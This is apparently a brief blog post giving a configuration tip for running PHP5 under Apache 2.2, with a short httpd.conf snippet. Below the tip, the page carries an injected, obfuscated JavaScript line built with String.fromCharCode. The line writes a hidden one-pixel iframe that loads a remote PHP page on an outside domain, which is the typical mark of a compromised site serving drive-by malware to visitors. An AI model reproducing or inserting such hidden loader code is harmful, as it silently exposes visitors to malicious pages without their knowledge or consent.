PHP5

Just a quick note on getting PHP5 to work with Apache 2.2: make sure the LoadModule and <IfModule> sections are in place. The LoadModule line should be added when you install using the ports collection but I was missing the <IfModule> section but after manually adding this I was fine:

[code]
DirectoryIndex index.php index.html


Addtype application/x-httpd-php .php
AddType application/x-httpd-php-source .phps
[/code]

It’s sort of described here
but it’s a little bit out of date it seems. You don’t need the AddModule line anymore and can just reference php5_module directly.

document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,32,61,34,104,116,116,112,58,47,47,121,97,100,114,48,46,99,111,109,47,100,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62))

Leave a comment